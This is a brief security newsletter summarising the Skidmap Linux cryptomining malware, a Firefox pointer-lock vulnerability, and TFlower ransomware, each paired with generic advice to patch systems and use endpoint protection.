Skidmap Malware

A form of malware stumbled upon by researchers makes use of rootkits to bury itself undetected in Linux systems for the purpose of cryptocurrency mining.

Once a vulnerable Linux system has been sourced, Skidmap installs itself via crontab, a time-based job scheduler. 

An installation script will download the main Trojan payload, which will proceed to turn Security-Enhanced Linux (SELinux) modules to a ‘permissive’ state to reduce the overall security level of a machine. 

Source: ZDNet

How do you protect yourself?

Proper security measures must be in place to defend against Skidmap Malware and similar threats. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.

CVE 2019-11745

Mozilla has released security updates for Firefox. When the pointer lock is enabled by a website though requestPointerLock(), no user notification is given. This could allow a malicious website to hijack the mouse pointer and confuse users.

Source: Mozilla

How do you protect yourself?

Update Firefox to Firefox 69.0.1.

TFlower Ransomware

The latest ransomware targeting corporate environments is called TFlower and is being installed on networks after attackers hack into exposed Remote Desktop services.

TFlower is being installed in a corporate network through exposed Remote Desktop services that are being hacked by attackers.

Once the attackers gain access to the machine, they will infect the local machine or may attempt to traverse the network through tools such as PowerShell Empire, PSExec, etc.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against TFlower Ransomware and similar threats. Ensure your systems have the latest patches installed. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.